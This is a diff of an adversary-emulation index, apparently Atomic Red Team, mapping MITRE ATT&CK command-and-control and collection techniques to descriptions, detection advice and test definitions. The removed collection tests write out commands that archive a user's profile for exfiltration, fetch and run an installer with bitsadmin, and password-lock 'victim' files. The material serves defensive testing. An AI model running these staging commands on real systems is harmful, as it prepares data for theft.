x_mitre_data_sources: - Process command-line parameters - File monitoring @@ -49438,17 +57472,7 @@ command-and-control: - Netflow/Enclave netflow - Network protocol analysis - Process monitoring - x_mitre_detection: |- - Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious. - - Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false + x_mitre_version: '2.0' identifier: T1105 atomic_tests: - name: rsync remote file copy (push) @@ -49816,6 +57840,21 @@ command-and-control: name: command_prompt T1090.001: technique: + created: '2020-03-14T23:08:20.244Z' + modified: '2020-03-15T00:46:26.598Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755 + description: |- + Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. + + By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. + name: Internal Proxy + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1090.001 @@ -49828,39 +57867,24 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Internal Proxy - description: |- - Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. - - By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. - id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-15T00:46:26.598Z' - created: '2020-03-14T23:08:20.244Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: 'Analyze network data for uncommon data flows between clients - that should not or often do not communicate with one another. Processes utilizing - the network that do not normally have network communication or have never - been seen before are suspicious. Analyze packet contents to detect communications - that do not follow the expected protocol behavior for the port that is being - used.(Citation: University of Birmingham C2)' + x_mitre_platforms: + - Linux + - macOS + - Windows x_mitre_data_sources: - Process use of network - Process monitoring - Network protocol analysis - Netflow/Enclave netflow - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_detection: 'Analyze network data for uncommon data flows between clients + that should not or often do not communicate with one another. Processes utilizing + the network that do not normally have network communication or have never + been seen before are suspicious. Analyze packet contents to detect communications + that do not follow the expected protocol behavior for the port that is being + used.(Citation: University of Birmingham C2)' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1090.001 atomic_tests: - name: Connection Proxy @@ -49998,15 +58022,9 @@ command-and-control: atomic_tests: [] T1071.003: technique: - created: '2020-03-15T16:21:45.131Z' - modified: '2020-03-26T20:28:00.985Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern id: attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b description: "Adversaries may communicate using application layer protocols - associated with electronic map delivery to avoid detection/network filtering + associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP @@ -50027,6 +58045,12 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-10-21T16:35:45.633Z' + created: '2020-03-15T16:21:45.131Z' x_mitre_platforms: - Linux - macOS @@ -50096,39 +58120,39 @@ command-and-control: - source_name: mitre-attack external_id: T1090.003 url: https://attack.mitre.org/techniques/T1090/003 + - source_name: Onion Routing + url: https://en.wikipedia.org/wiki/Onion_routing + description: Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Multi-hop Proxy - description: To disguise the source of malicious traffic, adversaries may chain - together multiple proxies. Typically, a defender will be able to identify - the last proxy traffic traversed before it enters their network; the defender - may or may not be able to identify any previous proxies before the last-hop - proxy. This technique makes identifying the original source of the malicious - traffic even more difficult by requiring the defender to trace malicious traffic - through several proxies to identify its source. + description: |- + To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing) + + In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport. id: attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-03-14T23:23:41.770Z' + modified: '2020-10-21T17:54:28.280Z' created: '2020-03-14T23:23:41.770Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true - x_mitre_detection: When observing use of Multi-hop proxies, network data from - the actual command and control servers could allow correlating incoming and - outgoing flows to trace malicious traffic back to its source. Multi-hop proxies - can also be detected by alerting on traffic to known anonymity networks (such - as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure - that uses this technique. + x_mitre_detection: |- + When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique. + + In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP. x_mitre_data_sources: + - Packet capture - Network protocol analysis - Netflow/Enclave netflow x_mitre_platforms: - Linux - macOS - Windows + - Network atomic_tests: [] T1026: technique: @@ -50179,13 +58203,14 @@ command-and-control: atomic_tests: [] T1095: technique: - id: attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Non-Application Layer Protocol - description: |- - Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). - - ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. + created: '2017-05-31T21:31:10.728Z' + modified: '2020-10-21T19:41:49.412Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1095 @@ -50194,34 +58219,33 @@ command-and-control: description: Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014. source_name: Wikipedia OSI + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. - url: http://support.microsoft.com/KB/170292 description: Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014. source_name: Microsoft ICMP + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-11T15:09:26.624Z' - created: '2017-05-31T21:31:10.728Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - - Linux - - macOS - x_mitre_network_requirements: true - x_mitre_detection: |- - Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network. + description: |- + Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). - Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) - - Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels. + ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) + Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. + name: Non-Application Layer Protocol + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b + x_mitre_version: '2.1' + x_mitre_contributors: + - Ryan Becwar x_mitre_data_sources: - Host network interface - Netflow/Enclave netflow @@ -50229,9 +58253,23 @@ command-and-control: - Network protocol analysis - Packet capture - Process use of network - x_mitre_contributors: - - Ryan Becwar - x_mitre_version: '2.0' + x_mitre_detection: "Analyze network traffic for ICMP messages or other protocols + that contain abnormal data or are not normally seen within or exiting the + network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data + for uncommon data flows (e.g., a client sending significantly more data than + it receives from a server). Processes utilizing the network that do not normally + have network communication or have never been seen before are suspicious. + Analyze packet contents to detect communications that do not follow the expected + protocol behavior for the port that is being used.(Citation: University of + Birmingham C2) \n\nMonitor and investigate API calls to functions associated + with enabling and/or utilizing alternative communication channels." + x_mitre_network_requirements: true + x_mitre_platforms: + - Windows + - Linux + - macOS + - Network + x_mitre_is_subtechnique: false identifier: T1095 atomic_tests: - name: ICMP C2 @@ -50548,9 +58586,9 @@ command-and-control: phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-07-01T18:23:25.002Z' + modified: '2020-10-21T01:26:31.804Z' created: '2020-07-01T18:23:25.002Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -50563,6 +58601,7 @@ command-and-control: - Linux - macOS - Windows + - Network atomic_tests: [] T1001.003: technique: @@ -50685,13 +58724,8 @@ command-and-control: atomic_tests: [] T1090: technique: - id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Proxy - description: |- - Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. - - Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1090 @@ -50704,34 +58738,40 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + description: |- + Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. + + Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. + name: Proxy + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-06-20T20:53:20.670Z' + modified: '2020-10-21T17:54:28.531Z' created: '2017-05-31T21:31:08.479Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: |- - Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) - - Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)). + x_mitre_version: '3.1' + x_mitre_contributors: + - Brian Prange + - Heather Linn + - Walker Johnson x_mitre_data_sources: - SSL/TLS inspection - Process use of network - Process monitoring - Netflow/Enclave netflow - Packet capture - x_mitre_contributors: - - Brian Prange - - Heather Linn - - Walker Johnson - x_mitre_version: '3.0' + x_mitre_detection: |- + Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) + + Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)). + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + x_mitre_is_subtechnique: false atomic_tests: [] T1219: technique: @@ -51034,6 +59074,8 @@ command-and-control: Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. external_references: - source_name: mitre-attack external_id: T1205 @@ -51042,6 +59084,18 @@ command-and-control: description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.' source_name: Hartrell cd00r 2002 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern @@ -51052,7 +59106,7 @@ command-and-control: phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-07-01T18:27:41.755Z' + modified: '2020-10-21T15:30:44.964Z' created: '2018-04-18T17:59:24.739Z' x_mitre_contributors: - Josh Day, Gigamon @@ -51065,12 +59119,13 @@ command-and-control: - Linux - macOS - Windows + - Network x_mitre_network_requirements: true x_mitre_detection: Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. x_mitre_defense_bypassed: - Defensive network service scanning - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_is_subtechnique: false atomic_tests: [] T1071.001: @@ -51251,2423 +59306,6 @@ command-and-control: x_mitre_version: '1.1' x_mitre_is_subtechnique: false atomic_tests: [] -collection: - T1560: - technique: - created: '2020-02-20T20:53:45.725Z' - modified: '2020-03-29T18:27:31.040Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern - id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a - description: |- - An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. - - Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method. - name: Archive Collected Data - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1560 - url: https://attack.mitre.org/techniques/T1560 - - url: https://en.wikipedia.org/wiki/List_of_file_signatures - description: Wikipedia. (2016, March 31). List of file signatures. Retrieved - April 22, 2016. - source_name: Wikipedia File Header Signatures - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - File monitoring - - Binary file metadata - x_mitre_detection: |- - Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. - - A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. - - Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - identifier: T1560 - atomic_tests: - - name: Compress Data for Exfiltration With PowerShell - auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597 - description: "An adversary may compress data (e.g., sensitive documents) that - is collected prior to exfiltration.\nWhen the test completes you should find - the files from the $env:USERPROFILE directory compressed in a file called - T1560-data-ps.zip in the $env:USERPROFILE directory \n" - supported_platforms: - - windows - input_arguments: - input_file: - description: Path that should be compressed into our output file - type: Path - default: "$env:USERPROFILE" - output_file: - description: Path where resulting compressed data should be placed - type: Path - default: "$env:USERPROFILE\\T1560-data-ps.zip" - executor: - name: powershell - elevation_required: false - command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - -' - cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' - T1560.003: - technique: - created: '2020-02-20T21:09:55.995Z' - modified: '2020-03-25T22:48:14.605Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern - id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b - description: 'An adversary may compress or encrypt data that is collected prior - to exfiltration using a custom method. Adversaries may choose to use custom - archival methods, such as encryption with XOR or stream ciphers implemented - with no external library or utility references. Custom implementations of - well-known compression algorithms have also been used.(Citation: ESET Sednit - Part 2)' - name: Archive via Custom Method - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1560.003 - url: https://attack.mitre.org/techniques/T1560/003 - - url: http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf - description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing - the Comings and Goings. Retrieved November 21, 2016.' - source_name: ESET Sednit Part 2 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: Custom archival methods can be very difficult to detect, - since many of them use standard programming language concepts, such as bitwise - operations. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1560.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1560.002 - url: https://attack.mitre.org/techniques/T1560/002 - - source_name: PyPI RAR - url: https://pypi.org/project/rarfile/ - description: mkz. (2020). rarfile 3.1. Retrieved February 20, 2020. - - source_name: libzip - url: https://libzip.org/ - description: D. Baron, T. Klausner. (2020). libzip. Retrieved February 20, - 2020. - - source_name: Zlib Github - url: https://github.com/madler/zlib - description: madler. (2017). zlib. Retrieved February 20, 2020. - - url: https://en.wikipedia.org/wiki/List_of_file_signatures - description: Wikipedia. (2016, March 31). List of file signatures. Retrieved - April 22, 2016. - source_name: Wikipedia File Header Signatures - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Archive via Library - description: |- - An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data. - - Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism. - id: attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-29T18:27:30.891Z' - created: '2020-02-20T21:08:52.529Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used. - - Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1560.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1560.001 - url: https://attack.mitre.org/techniques/T1560/001 - - source_name: 7zip Homepage - url: https://www.7-zip.org/ - description: I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020. - - source_name: WinRAR Homepage - url: https://www.rarlab.com/ - description: A. Roshal. (2020). RARLAB. Retrieved February 20, 2020. - - source_name: WinZip Homepage - url: https://www.winzip.com/win/en/ - description: Corel Corporation. (2020). WinZip. Retrieved February 20, 2020. - - url: https://en.wikipedia.org/wiki/List_of_file_signatures - description: Wikipedia. (2016, March 31). List of file signatures. Retrieved - April 22, 2016. - source_name: Wikipedia File Header Signatures - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Archive via Utility - description: |- - An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data. - - Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems. - id: attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-25T21:54:37.374Z' - created: '2020-02-20T21:01:25.428Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. - - Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - File monitoring - - Binary file metadata - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1560.001 - atomic_tests: - - name: Compress Data for Exfiltration With Rar - auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 - description: "An adversary may compress data (e.g., sensitive documents) that - is collected prior to exfiltration.\nWhen the test completes you should find - the txt files from the %USERPROFILE% directory compressed in a file called - T1560.001-data.rar in the %USERPROFILE% directory \n" - supported_platforms: - - windows - input_arguments: - input_path: - description: Path that should be compressed into our output file - type: Path - default: "%USERPROFILE%" - file_extension: - description: Extension of files to compress - type: String - default: ".txt" - output_file: - description: Path where resulting compressed data should be placed - type: Path - default: "%USERPROFILE%\\T1560.001-data.rar" - rar_installer: - description: Winrar installer - type: Path - default: "%TEMP%\\winrar.exe" - rar_exe: - description: The RAR executable from Winrar - type: Path - default: "%programfiles%/WinRAR/Rar.exe" - dependencies: - - description: 'Rar tool must be installed at specified location (#{rar_exe}) - -' - prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - -' - get_prereq_command: | - echo Downloading Winrar installer - bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} - echo Follow the installer prompts to install Winrar - #{rar_installer} - executor: - name: command_prompt - elevation_required: false - command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} - -' - cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - -' - - name: Compress Data and lock with password for Exfiltration with winrar - auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c - description: | - Note: Requires winrar installation - rar a -p"blue" hello.rar (VARIANT) - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: false - command: | - mkdir .\tmp\victim-files - cd .\tmp\victim-files - echo "This file will be encrypted" > .\encrypted_file.txt - rar a -hp"blue" hello.rar - dir - - name: Compress Data and lock with password for Exfiltration with winzip - auto_generated_guid: 